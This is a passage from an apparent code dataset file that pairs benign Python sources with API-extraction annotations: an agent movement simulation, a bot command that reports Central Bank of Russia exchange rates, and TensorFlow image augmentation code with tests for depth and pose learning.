ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((3139, 3182), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (['"""./backup_model_last.hdf5"""'], {}), "('./backup_model_last.hdf5')\n", (3154, 3182), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((3202, 3266), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (['"""./backup_model_best.hdf5"""'], {'save_best_only': '(True)'}), "('./backup_model_best.hdf5', save_best_only=True)\n", (3217, 3266), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n')]
|
"""
Agents!
Create a number of Agents, each with a random x and y coordinate (0-99).
Cycle through a number of iteration steps.
For each iteration randomly move the agent by +/- 1 unit in each direction.
The agent must stay within the bounds of the model 0-99.
Calculate the final distance between all the agents.
Plot the final agent positions.
Highlight the two closest Agents and the two furthest Agents
"""
import operator
import matplotlib.pyplot
import agentframework
def distance_between(agents_row_a, agents_row_b):
""" determine distance between two agents """
dy=agents_row_b.y-agents_row_a.y
dx=agents_row_b.x-agents_row_a.x
return((dx**2+dy**2)**0.5)
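    # e.g. agents at (0, 0) and (3, 4) are (3**2 + 4**2)**0.5 = 5.0 units apart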
num_of_agents = 10
num_of_iterations = 100
agents = []
""" Make the agents using the Agent class """
for i in range(num_of_agents):
agents.append(agentframework.Agent())
""" Move the agents using the move method """
for j in range(num_of_iterations):
for i in range(num_of_agents):
agents[i].move()
""" Plot agent locations """
matplotlib.pyplot.ylim(0, 99)
matplotlib.pyplot.xlim(0, 99)
for i in range(num_of_agents):
matplotlib.pyplot.scatter(agents[i].x,agents[i].y,color="blue")
""" Distance between all agents stored in a list, mat[] """
""" Do not include repeated pairings or self pairings """
mat=[]
for i in range(num_of_agents-1):
for j in range(i+1,num_of_agents):
distance=distance_between(agents[i], agents[j])
mat.append([i,j,distance])
""" Maximum and Minimum distance between two agents """
dmax = max(mat, key=operator.itemgetter(2))
dmin = min(mat, key=operator.itemgetter(2))
print("\nmax distance is ",dmax[2],"between agents",dmax[0],"and",dmax[1])
print("\nmin distance is ",dmin[2],"between agents",dmin[0],"and",dmin[1])
""" Plot maximum and minimum pairs """
matplotlib.pyplot.scatter(agents[dmax[0]].x,agents[dmax[0]].y,color="red")
matplotlib.pyplot.scatter(agents[dmax[1]].x,agents[dmax[1]].y,color="red")
matplotlib.pyplot.scatter(agents[dmin[0]].x,agents[dmin[0]].y,color="green")
matplotlib.pyplot.scatter(agents[dmin[1]].x,agents[dmin[1]].y,color="green")
matplotlib.pyplot.show()
|
[
"operator.itemgetter",
"agentframework.Agent"
] |
[((844, 866), 'agentframework.Agent', 'agentframework.Agent', ([], {}), '()\n', (864, 866), False, 'import agentframework\n'), ((1586, 1608), 'operator.itemgetter', 'operator.itemgetter', (['(2)'], {}), '(2)\n', (1605, 1608), False, 'import operator\n'), ((1630, 1652), 'operator.itemgetter', 'operator.itemgetter', (['(2)'], {}), '(2)\n', (1649, 1652), False, 'import operator\n')]
|
import configparser
import random
import os
import requests
from common import doc, set_help, set_aliases, get_aliases
from lxml import etree
config = configparser.ConfigParser()
config.read('config.ini')
BOT_NAME = config['bot']['name']
if config['bot']['cmd_without_dash'] == 'yes':
CMD_SIGN = ''
else:
CMD_SIGN = '-'
URL = 'http://www.cbr.ru/scripts/XML_daily.asp'
def get_available_currencies():
cur_list = []
r = requests.get(URL)
tree = etree.fromstring(r.content)
tree = tree.getroottree()
root = tree.getroot()
for node in root:
cur_list.append(node.find('CharCode').text)
return ' '.join(cur_list)
s = _("""Returns currency rates from Central Bank of Russia (cbr.ru)
Available currencies:
{currencies}
Example usage:
{CMD_SIGN}{BOT_NAME} {first_aliase} USD
{CMD_SIGN}{BOT_NAME} {first_aliase} usd""").format(
first_aliase=get_aliases('cbr_currency')[0],
CMD_SIGN=CMD_SIGN,
BOT_NAME=BOT_NAME,
currencies=get_available_currencies())
@set_aliases(get_aliases('cbr_currency'))
@set_help(s)
def cbr_currency(cmd):
if len(cmd) == 0: return None
if " " in cmd:
currency = cmd.split()[1].strip()
else:
currency = None
if currency:
r = requests.get(URL)
tree = etree.fromstring(r.content)
tree = tree.getroottree()
root = tree.getroot()
msg = _("Exchange rate of ")
for node in root:
if node.find('CharCode').text.lower() == currency.lower():
char_code = node.find('CharCode').text
nominal = node.find('Nominal').text
name = node.find('Name').text
value = node.find('Value').text
return _("""{msg} {char_code}:
{nominal} {name} - {value} RUB""".format(msg=msg,
char_code=char_code, nominal=nominal, name=name, value=value))
err_msg = _("""Unknown currency. Available currencies:
{currencies}""".format(currencies=get_available_currencies()))
return err_msg
else:
return s
|
[
"lxml.etree.fromstring",
"common.get_aliases",
"common.set_help",
"requests.get",
"configparser.ConfigParser"
] |
[((152, 179), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (177, 179), False, 'import configparser\n'), ((1077, 1088), 'common.set_help', 'set_help', (['s'], {}), '(s)\n', (1085, 1088), False, 'from common import doc, set_help, set_aliases, get_aliases\n'), ((438, 455), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (450, 455), False, 'import requests\n'), ((467, 494), 'lxml.etree.fromstring', 'etree.fromstring', (['r.content'], {}), '(r.content)\n', (483, 494), False, 'from lxml import etree\n'), ((1047, 1074), 'common.get_aliases', 'get_aliases', (['"""cbr_currency"""'], {}), "('cbr_currency')\n", (1058, 1074), False, 'from common import doc, set_help, set_aliases, get_aliases\n'), ((1271, 1288), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1283, 1288), False, 'import requests\n'), ((1304, 1331), 'lxml.etree.fromstring', 'etree.fromstring', (['r.content'], {}), '(r.content)\n', (1320, 1331), False, 'from lxml import etree\n'), ((901, 928), 'common.get_aliases', 'get_aliases', (['"""cbr_currency"""'], {}), "('cbr_currency')\n", (912, 928), False, 'from common import doc, set_help, set_aliases, get_aliases\n')]
|
import tensorflow as tf
from utils.util_class import WrongInputException
def augmentation_factory(augment_probs=None):
augment_probs = augment_probs if augment_probs else dict()
augmenters = []
for key, prob in augment_probs.items():
if key is "CropAndResize":
augm = CropAndResize(prob)
elif key is "HorizontalFlip":
augm = HorizontalFlip(prob)
elif key is "ColorJitter":
augm = ColorJitter(prob)
else:
raise WrongInputException(f"Wrong augmentation type: {key}")
augmenters.append(augm)
total_augment = TotalAugment(augmenters)
return total_augment
class TotalAugment:
def __init__(self, augment_objects=None):
self.augment_objects = augment_objects
def __call__(self, features):
feat_aug = self.preprocess(features)
for augmenter in self.augment_objects:
feat_aug = augmenter(feat_aug)
feat_aug = self.postprocess(features, feat_aug)
return feat_aug
def preprocess(self, features):
"""
!!NOTE!!
when changing input dict's key or value, you MUST copy a dict like
feat_aug = {key: val for key, val in features.items()}
"""
# create a new feature dict
feat_aug = {key: val for key, val in features.items() if "image5d" not in key}
# to use tf.image functions, reshape to [batch*snippet, height, width, 3]
batch, snippet, height, width, channels = features["image5d"].get_shape()
imshape = (batch * snippet, height, width, channels)
feat_aug["image5d"] = tf.reshape(features["image5d"], imshape)
if "image5d_R" in features:
feat_aug["image5d_R"] = tf.reshape(features["image5d_R"], imshape)
return feat_aug
def postprocess(self, features, feat_aug):
image5d = features["image5d"]
feat_aug["image5d"] = tf.reshape(feat_aug["image5d"], image5d.get_shape())
if "image5d_R" in feat_aug:
feat_aug["image5d_R"] = tf.reshape(feat_aug["image5d_R"], image5d.get_shape())
return feat_aug
class AugmentBase:
def __init__(self, aug_prob=0.):
self.aug_prob = aug_prob
self.param = 0
def __call__(self, features):
raise NotImplementedError()
class CropAndResize(AugmentBase):
"""
randomly crop "image5d" and resize it to original size
create "intrinsic_aug" as camera matrix for "image5d"
"""
def __init__(self, aug_prob=0.3):
super().__init__(aug_prob)
self.half_crop_ratio = 0.1
def __call__(self, features):
nimage, height, width, _ = features["image5d"].get_shape()
crop_size = tf.constant([height, width])
box_indices = tf.range(0, nimage)
boxes = self.random_crop_boxes(nimage)
self.param = boxes[0]
features["image5d"] = tf.image.crop_and_resize(features["image5d"], boxes, box_indices, crop_size)
features["intrinsic"] = self.adjust_intrinsic(features["intrinsic"], boxes, crop_size)
if "image5d_R" in features:
features["image5d_R"] = tf.image.crop_and_resize(features["image5d_R"], boxes, box_indices, crop_size)
features["intrinsic_R"] = self.adjust_intrinsic(features["intrinsic_R"], boxes, crop_size)
if "depth_gt" in features:
batch = features["depth_gt"].get_shape()[0]
features["depth_gt"] = tf.image.crop_and_resize(features["depth_gt"], boxes[:batch], box_indices[:batch],
crop_size, method="nearest")
return features
def random_crop_boxes(self, num_box):
# aug_prob : 1-aug_prob = half_crop_ratio : minval1
maxval1 = self.half_crop_ratio
minval1 = -(1. - self.aug_prob) * self.half_crop_ratio / self.aug_prob
y1x1 = tf.random.uniform((1, 2), minval1, maxval1)
y1x1 = tf.clip_by_value(y1x1, 0, 1)
minval2 = 1. - maxval1
maxval2 = 1. - minval1
y2x2 = tf.random.uniform((1, 2), minval2, maxval2)
y2x2 = tf.clip_by_value(y2x2, 0, 1)
assert (minval1 < maxval1) and (minval2 < maxval2)
# boxes: [1, 4]
boxes = tf.concat([y1x1, y2x2], axis=1)
# boxes: [num_box, 4]
boxes = tf.tile(boxes, [num_box, 1])
return boxes
def adjust_intrinsic(self, intrinsic, boxes, imsize):
"""
:param intrinsic: [batch, 3, 3]
:param boxes: (y1,x1,y2,x2) in range [0~1] [batch, 4]
:param imsize: [height, width] [2]
:return: adjusted intrinsic [batch, 3, 3]
"""
imsize = tf.cast(imsize, tf.float32)
# size: [1, 3, 3], contents: [[0, 0, x1_ratio*width], [0, 0, y1_ratio*height], [0, 0, 0]]
center_change = tf.stack([tf.stack([0., 0., boxes[0, 1]*imsize[1]], axis=0),
tf.stack([0., 0., boxes[0, 0]*imsize[0]], axis=0),
tf.stack([0., 0., 0.], axis=0)], axis=0)
# cx'=cx-x1, cy'=cy-y1
intrin_crop = intrinsic - center_change
# cx,fx *= W/(x2-x1), cy,fy *= H/(y2-y1)
x_ratio = 1. / (boxes[0, 3] - boxes[0, 1])
y_ratio = 1. / (boxes[0, 2] - boxes[0, 0])
intrin_adj = tf.stack([intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio, intrin_crop[:, 2]], axis=1)
return intrin_adj
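        # Worked example (illustrative): for a 100x100 image and crop box
        # (y1, x1, y2, x2) = (0.1, 0.1, 0.9, 0.9), cx = 50 maps to
        # (50 - 0.1*100) / (0.9 - 0.1) = 50 while fx scales by 1/0.8 = 1.25,
        # matching the zoom-in of resizing the crop back to full size.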
class HorizontalFlip(AugmentBase):
"""
randomly horizontally flip "image5d" by aug_prob
"""
def __init__(self, aug_prob=0.2):
super().__init__(aug_prob)
def __call__(self, features):
rndval = tf.random.uniform(())
features = tf.cond(rndval < self.aug_prob,
lambda: self.flip_features(features),
lambda: features
)
return features
def flip_features(self, features):
feat_aug = dict()
feat_aug["image5d"] = tf.image.flip_left_right(features["image5d"])
if "image5d_R" in features:
feat_aug["image5d_R"] = tf.image.flip_left_right(features["image5d_R"])
feat_aug["intrinsic"] = self.flip_intrinsic(features["intrinsic"], features["image5d"].get_shape())
if "intrinsic_R" in features:
feat_aug["intrinsic_R"] = self.flip_intrinsic(features["intrinsic_R"], features["image5d"].get_shape())
if "pose_gt" in features:
feat_aug["pose_gt"] = self.flip_gt_pose(features["pose_gt"])
if "pose_gt_R" in features:
feat_aug["pose_gt_R"] = self.flip_gt_pose(features["pose_gt_R"])
if "stereo_T_LR" in features:
feat_aug["stereo_T_LR"] = self.flip_stereo_pose(features["stereo_T_LR"])
feat_rest = {key: val for key, val in features.items() if key not in feat_aug}
feat_aug.update(feat_rest)
return feat_aug
def flip_intrinsic(self, intrinsic, imshape):
batch, height, width, _ = imshape
intrin_wh = tf.constant([[[0, 0, width], [0, 0, 0], [0, 0, 0]]], dtype=tf.float32)
intrin_flip = tf.abs(intrin_wh - intrinsic)
return intrin_flip
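        # Note (illustrative): abs(intrin_wh - K) maps cx to width - cx and
        # leaves fx, fy, cy unchanged (all positive), i.e. the intrinsic of
        # the horizontally mirrored image.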
def flip_gt_pose(self, pose):
T_flip = tf.constant([[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]], dtype=tf.float32)
# [batch, numsrc, 4, 4] = [1, 1, 4, 4] @ [batch, numsrc, 4, 4] @ [1, 1, 4, 4]
pose_flip = T_flip @ pose @ tf.linalg.inv(T_flip)
return pose_flip
def flip_stereo_pose(self, pose):
T_flip = tf.constant([[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]], dtype=tf.float32)
# [batch, 4, 4] = [1, 4, 4] @ [batch, 4, 4] @ [1, 4, 4]
pose_flip = T_flip @ pose @ tf.linalg.inv(T_flip)
return pose_flip
class ColorJitter(AugmentBase):
def __init__(self, aug_prob=0.2):
super().__init__(aug_prob)
def __call__(self, features):
rndval = tf.random.uniform(())
gamma = tf.random.uniform((), minval=0.5, maxval=1.5)
saturation = tf.random.uniform((), minval=0.5, maxval=1.5)
features["image5d"], self.param = \
tf.cond(rndval < self.aug_prob,
lambda: self.jitter_color(features["image5d"], gamma, saturation),
lambda: (features["image5d"], tf.constant([0, 0], dtype=tf.float32))
)
if "image5d_R" in features:
features["image5d_R"], self.param = \
tf.cond(rndval < self.aug_prob,
lambda: self.jitter_color(features["image5d_R"], gamma, saturation),
lambda: (features["image5d_R"], tf.constant([0, 0], dtype=tf.float32))
)
return features
def jitter_color(self, image, gamma, saturation):
# convert image -1 ~ 1 to 0 ~ 1
image = (image + 1.) / 2.
image = tf.image.adjust_saturation(image, saturation)
image = tf.image.adjust_gamma(image, gamma=gamma, gain=1.)
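        # Note (illustrative): adjust_gamma with gain=1 computes image ** gamma
        # on the [0, 1] range, so gamma < 1 brightens and gamma > 1 darkens.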
# convert image 0 ~ 1 to -1 ~ 1
image = image * 2. - 1.
param = tf.stack([gamma, saturation], axis=0)
return image, param
# ---------------------------------
import numpy as np
import utils.convert_pose as cp
def test_random_crop_boxes():
print("===== test test_random_crop_boxes")
cropper = CropAndResize()
boxes = cropper.random_crop_boxes(4)
print("boxes:", boxes)
wh = boxes[:, 2:] - boxes[:, :2]
assert (wh.numpy() > cropper.half_crop_ratio*2).all()
print("!!! test_random_crop_boxes passed")
def test_adjust_intrinsic():
print("===== test test_adjust_intrinsic")
batch, height, width = 3, 200, 240
imsize = tf.constant([height, width], dtype=tf.float32)
intrinsic = tf.constant([[[width/2, 0, width/2], [0, height/2, height/2], [0, 0, 1]]], dtype=tf.float32)
intrinsic = tf.tile(intrinsic, [batch, 1, 1])
print("intrinsic original", intrinsic[0])
xcrop, ycrop = 0.05, 0.1
cropper = CropAndResize()
boxes = tf.tile(tf.constant([[ycrop, xcrop, 1-ycrop, 1-xcrop]]), [batch, 1])
print("crop box:", boxes[0])
# EXECUTE
intrin_adj = cropper.adjust_intrinsic(intrinsic, boxes, imsize)
print("intrinsic adjusted", intrin_adj[0])
assert np.isclose(intrin_adj.numpy()[0], intrin_adj.numpy()[-1]).all()
assert np.isclose(intrin_adj[0, 0, 0], width / 2 / (1 - 2*xcrop)), \
f"fx={intrin_adj[0, 0, 0]}, expected={width / 2 / (1 - 2*xcrop)}"
assert np.isclose(intrin_adj[0, 0, 2], width / 2), \
f"cx={intrin_adj[0, 0, 2]}, expected={width / 2}"
print("!!! test_adjust_intrinsic passed")
def test_flip_pose_np():
print("===== test test_flip_pose_np")
batch = 2
pose_vec = np.random.uniform(-2, 2, (batch, 6))
pose_mat = cp.pose_rvec2matr(pose_vec)
flip = np.identity(4)
flip[0, 0] = -1
flip = flip[np.newaxis, ...]
pose_mat_flip = np.matmul(np.matmul(flip, pose_mat), np.linalg.inv(flip))
pose_vec_flip = cp.pose_matr2rvec(pose_mat_flip)
print("pose vec:\n", pose_vec)
print("pose mat:\n", pose_mat)
print("pose mat flip:\n", pose_mat_flip)
print("pose vec flip:\n", pose_vec_flip)
print("pose vec rotation: (rad)\n", np.linalg.norm(pose_vec[:, 3:], axis=1))
print("pose vec flip rotation: (rad)\n", np.linalg.norm(pose_vec_flip[:, 3:], axis=1))
print("pose == pose_flip:\n", np.isclose(pose_vec, pose_vec_flip))
flip_vec = np.array([[-1, 1, 1, 1, -1, -1]], dtype=np.float32)
assert np.isclose(pose_vec, pose_vec_flip*flip_vec).all()
print("!!! test_flip_pose_np passed")
def test_flip_pose_tf():
print("===== test test_flip_pose_tf")
batch, numsrc = 2, 2
pose_vec = tf.random.uniform((batch, numsrc, 6), -2, 2)
pose_mat = cp.pose_rvec2matr_batch_tf(pose_vec)
flipper = HorizontalFlip()
pose_mat_flip = flipper.flip_gt_pose(pose_mat)
pose_vec_flip = cp.pose_matr2rvec_batch(pose_mat_flip)
print("pose vec:\n", pose_vec[1])
print("pose mat:\n", pose_mat[1, 1])
print("pose mat flip:\n", pose_mat_flip[1, 1])
print("pose vec flip:\n", pose_vec_flip[1])
print("pose vec rotation [batch, numsrc]: (rad)\n", np.linalg.norm(pose_vec[:, :, 3:], axis=1))
print("pose vec flip rotation [batch, numsrc]: (rad)\n", np.linalg.norm(pose_vec_flip[:, :, 3:], axis=1))
print("pose == pose_flip:\n", np.isclose(pose_vec[1, 1], pose_vec_flip[1, 1]))
flip_vec = tf.constant([[[[-1, 1, 1, 1, -1, -1]]]], dtype=tf.float32)
assert np.isclose(pose_vec.numpy(), pose_vec_flip.numpy()*flip_vec, atol=1.e-3).all(), \
f"{pose_vec.numpy() - pose_vec_flip.numpy()*flip_vec}"
print("!!! test_flip_pose_tf passed")
def test_flip_intrinsic():
print("===== test test_flip_intrinsic")
batch, height, width = 3, 200, 240
intrinsic = tf.random.uniform((batch, 3, 3), minval=100, maxval=200)
print("intrinsic original", intrinsic[0])
imshape = (batch, height, width, 3)
flipper = HorizontalFlip()
# EXECUTE
intrin_flip = flipper.flip_intrinsic(intrinsic, imshape)
intrinsic = intrinsic.numpy()
intrin_flip = intrin_flip.numpy()
# fy, cy: SAME
assert np.isclose(intrinsic[:, 1:], intrin_flip[:, 1:]).all(), \
f"original\n{intrinsic[:, 1:]}\nflipped\n{intrin_flip[:, 1:]}"
# fx: SAME
assert np.isclose(intrinsic[:, 0, :2], intrin_flip[:, 0, :2]).all(), \
f"original\n{intrinsic[:, 0, :2]}\nflipped\n{intrin_flip[:, 0, :2]}"
# cx <- W - cx
assert np.isclose(width - intrinsic[:, 0, 2], intrin_flip[:, 0, 2]).all(), \
f"original\n{intrinsic[:, 0, 2]}\nflipped\n{intrin_flip[:, 0, 2]}"
print("horizontally flipped intrinsic\n", intrin_flip[0])
print("!!! test_flip_intrinsic passed")
import os.path as op
import cv2
from config import opts
from tfrecords.tfrecord_reader import TfrecordReader
from utils.util_funcs import to_uint8_image, multi_scale_depths
from model.synthesize.synthesize_base import SynthesizeMultiScale
from utils.convert_pose import pose_matr2rvec_batch
def test_augmentations():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
total_aug = TotalAugment()
data_aug = {"CropAndResize": CropAndResize(aug_prob=0.5),
"HorizontalFlip": HorizontalFlip(aug_prob=0.5),
"ColorJitter": ColorJitter(aug_prob=0.5)}
for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi}: new features ~~~~~~~~~~!!")
images = []
feat_aug = total_aug.preprocess(features)
img = show_result(feat_aug, "preprocess")
images.append(img)
for name, augment in data_aug.items():
feat_aug = augment(feat_aug)
img = show_result(feat_aug, name, augment.param)
images.append(img)
feat_aug = total_aug.postprocess(features, feat_aug)
source_image, synth_target = synthesize_target(feat_aug)
images.append(synth_target)
images.append(source_image)
images = np.concatenate(images, axis=0)
cv2.imshow("augmentation", images)
ori_images = []
raw_image_u8 = to_uint8_image(features["image"])
ori_images.append(raw_image_u8[0, -opts.get_img_shape("H"):])
source_image, synth_target = synthesize_target(features)
ori_images.append(synth_target)
ori_images.append(source_image)
ori_images = np.concatenate(ori_images, axis=0)
cv2.imshow("original image", ori_images)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
def show_result(features, name, param=""):
print(f"----- augmentation: {name}")
print("parameter:", param)
image_u8 = to_uint8_image(features["image5d"])
target_index = opts.SNIPPET_LEN - 1
target = image_u8[target_index].numpy()
intrin = features["intrinsic"]
print("intrinsic:\n", intrin[0].numpy())
pose = features["pose_gt"]
print("pose:\n", pose[0, 0].numpy())
return target
def synthesize_target(features):
sources, target, intrinsic, depth_gt_ms, pose_gt = prep_synthesize(features)
synth_target_ms = SynthesizeMultiScale()(sources, intrinsic, depth_gt_ms, pose_gt)
synth_u8 = to_uint8_image(synth_target_ms[0])
synth_u8 = synth_u8[0, 0].numpy()
source_u8 = to_uint8_image(sources)
source_u8 = source_u8[0, 0].numpy()
return source_u8, synth_u8
def prep_synthesize(features):
image5d = features["image5d"]
sources = image5d[:, :-1]
target = image5d[:, -1]
intrinsic = features["intrinsic"]
pose_gt = features["pose_gt"]
pose_gt = pose_matr2rvec_batch(pose_gt)
depth_gt = features["depth_gt"]
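    # multi-scale ground-truth depth, downscaled by factors 1, 2, 4 and 8,
    # presumably matching the outputs consumed by SynthesizeMultiScale above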
depth_gt_ms = multi_scale_depths(depth_gt, [1, 2, 4, 8])
return sources, target, intrinsic, depth_gt_ms, pose_gt
def test_augmentation_factory():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
augmenter = augmentation_factory(opts.AUGMENT_PROBS)
for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi}: new features ~~~~~~~~~~!!")
print(features.keys())
print("before augment features:")
fkeys = list(features.keys())
for i in range(np.ceil(len(features.keys())/5.).astype(int)):
print(fkeys[i*5:(i+1)*5])
feat_aug = augmenter(features)
print("after augment features:")
fkeys = list(feat_aug.keys())
for i in range(np.ceil(len(feat_aug.keys())/5.).astype(int)):
print(fkeys[i*5:(i+1)*5])
image = to_uint8_image(features["image5d_R"][1])
image_aug = to_uint8_image(feat_aug["image5d_R"][1])
snippet, height, width, chann = image.get_shape()
image = image.numpy().reshape(-1, width, chann)
image_aug = image_aug.numpy().reshape(-1, width, chann)
image = np.concatenate([image, image_aug], axis=1)
cv2.imshow("image vs augmented", image)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
import utils.util_funcs as uf
def test_stereo_augmentation():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
augmenter = augmentation_factory(opts.AUGMENT_PROBS)
batidx, sclidx = 0, 0
for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi} step ~~~~~~~~~~!!")
view_imgs = dict()
feat_aug = augmenter(features)
pose_T_RL = tf.linalg.inv(feat_aug["stereo_T_LR"])
pose_T_RL = cp.pose_matr2rvec_batch(tf.expand_dims(pose_T_RL, 1))
right_target = tf.expand_dims(feat_aug["image5d_R"][:, -1], 1)
depth_ms = uf.multi_scale_depths(feat_aug["depth_gt"], [1, 2, 4, 8])
synth_stereo_left = SynthesizeMultiScale()(source_image=right_target,
intrinsic=feat_aug["intrinsic"],
pred_depth_ms=depth_ms,
pred_pose=pose_T_RL)
view_imgs["raw_left_target"] = features["image5d"][batidx, -1]
view_imgs["raw_right_target"] = features["image5d_R"][batidx, -1]
view_imgs["aug_left_target_orig"] = feat_aug["image5d"][batidx, -1]
view_imgs["aug_left_target_synt"] = synth_stereo_left[sclidx][batidx, 0]
view_imgs["aug_right_target"] = feat_aug["image5d_R"][batidx, -1]
view = uf.stack_titled_images(view_imgs)
cv2.imshow("stereo synthesis", view)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
if __name__ == "__main__":
test_random_crop_boxes()
test_adjust_intrinsic()
test_flip_pose_np()
test_flip_pose_tf()
test_flip_intrinsic()
test_augmentations()
test_augmentation_factory()
test_stereo_augmentation()
|
[
"tensorflow.image.flip_left_right",
"tensorflow.clip_by_value",
"tensorflow.reshape",
"tensorflow.image.crop_and_resize",
"numpy.isclose",
"tensorflow.linalg.inv",
"numpy.linalg.norm",
"utils.convert_pose.pose_rvec2matr_batch_tf",
"cv2.imshow",
"os.path.join",
"tensorflow.abs",
"tensorflow.random.uniform",
"numpy.identity",
"tensorflow.concat",
"tensorflow.stack",
"tensorflow.cast",
"config.opts.get_img_shape",
"cv2.destroyAllWindows",
"tensorflow.image.adjust_saturation",
"tensorflow.range",
"utils.util_funcs.to_uint8_image",
"cv2.waitKey",
"tensorflow.constant",
"tensorflow.tile",
"model.synthesize.synthesize_base.SynthesizeMultiScale",
"numpy.linalg.inv",
"utils.convert_pose.pose_rvec2matr",
"tensorflow.image.adjust_gamma",
"utils.util_funcs.multi_scale_depths",
"numpy.concatenate",
"tensorflow.expand_dims",
"numpy.random.uniform",
"utils.util_funcs.stack_titled_images",
"utils.convert_pose.pose_matr2rvec_batch",
"utils.convert_pose.pose_matr2rvec",
"numpy.array",
"utils.util_class.WrongInputException",
"numpy.matmul"
] |
[((9665, 9711), 'tensorflow.constant', 'tf.constant', (['[height, width]'], {'dtype': 'tf.float32'}), '([height, width], dtype=tf.float32)\n', (9676, 9711), True, 'import tensorflow as tf\n'), ((9728, 9832), 'tensorflow.constant', 'tf.constant', (['[[[width / 2, 0, width / 2], [0, height / 2, height / 2], [0, 0, 1]]]'], {'dtype': 'tf.float32'}), '([[[width / 2, 0, width / 2], [0, height / 2, height / 2], [0, 0,\n 1]]], dtype=tf.float32)\n', (9739, 9832), True, 'import tensorflow as tf\n'), ((9837, 9870), 'tensorflow.tile', 'tf.tile', (['intrinsic', '[batch, 1, 1]'], {}), '(intrinsic, [batch, 1, 1])\n', (9844, 9870), True, 'import tensorflow as tf\n'), ((10308, 10368), 'numpy.isclose', 'np.isclose', (['intrin_adj[0, 0, 0]', '(width / 2 / (1 - 2 * xcrop))'], {}), '(intrin_adj[0, 0, 0], width / 2 / (1 - 2 * xcrop))\n', (10318, 10368), True, 'import numpy as np\n'), ((10458, 10500), 'numpy.isclose', 'np.isclose', (['intrin_adj[0, 0, 2]', '(width / 2)'], {}), '(intrin_adj[0, 0, 2], width / 2)\n', (10468, 10500), True, 'import numpy as np\n'), ((10709, 10745), 'numpy.random.uniform', 'np.random.uniform', (['(-2)', '(2)', '(batch, 6)'], {}), '(-2, 2, (batch, 6))\n', (10726, 10745), True, 'import numpy as np\n'), ((10761, 10788), 'utils.convert_pose.pose_rvec2matr', 'cp.pose_rvec2matr', (['pose_vec'], {}), '(pose_vec)\n', (10778, 10788), True, 'import utils.convert_pose as cp\n'), ((10800, 10814), 'numpy.identity', 'np.identity', (['(4)'], {}), '(4)\n', (10811, 10814), True, 'import numpy as np\n'), ((10966, 10998), 'utils.convert_pose.pose_matr2rvec', 'cp.pose_matr2rvec', (['pose_mat_flip'], {}), '(pose_mat_flip)\n', (10983, 10998), True, 'import utils.convert_pose as cp\n'), ((11418, 11469), 'numpy.array', 'np.array', (['[[-1, 1, 1, 1, -1, -1]]'], {'dtype': 'np.float32'}), '([[-1, 1, 1, 1, -1, -1]], dtype=np.float32)\n', (11426, 11469), True, 'import numpy as np\n'), ((11683, 11727), 'tensorflow.random.uniform', 'tf.random.uniform', (['(batch, numsrc, 6)', '(-2)', '(2)'], {}), '((batch, numsrc, 6), -2, 2)\n', (11700, 11727), True, 'import tensorflow as tf\n'), ((11743, 11779), 'utils.convert_pose.pose_rvec2matr_batch_tf', 'cp.pose_rvec2matr_batch_tf', (['pose_vec'], {}), '(pose_vec)\n', (11769, 11779), True, 'import utils.convert_pose as cp\n'), ((11882, 11920), 'utils.convert_pose.pose_matr2rvec_batch', 'cp.pose_matr2rvec_batch', (['pose_mat_flip'], {}), '(pose_mat_flip)\n', (11905, 11920), True, 'import utils.convert_pose as cp\n'), ((12408, 12466), 'tensorflow.constant', 'tf.constant', (['[[[[-1, 1, 1, 1, -1, -1]]]]'], {'dtype': 'tf.float32'}), '([[[[-1, 1, 1, 1, -1, -1]]]], dtype=tf.float32)\n', (12419, 12466), True, 'import tensorflow as tf\n'), ((12793, 12849), 'tensorflow.random.uniform', 'tf.random.uniform', (['(batch, 3, 3)'], {'minval': '(100)', 'maxval': '(200)'}), '((batch, 3, 3), minval=100, maxval=200)\n', (12810, 12849), True, 'import tensorflow as tf\n'), ((15635, 15658), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (15656, 15658), False, 'import cv2\n'), ((15791, 15826), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image5d']"], {}), "(features['image5d'])\n", (15805, 15826), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16299, 16333), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (['synth_target_ms[0]'], {}), '(synth_target_ms[0])\n', (16313, 16333), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16388, 16411), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', 
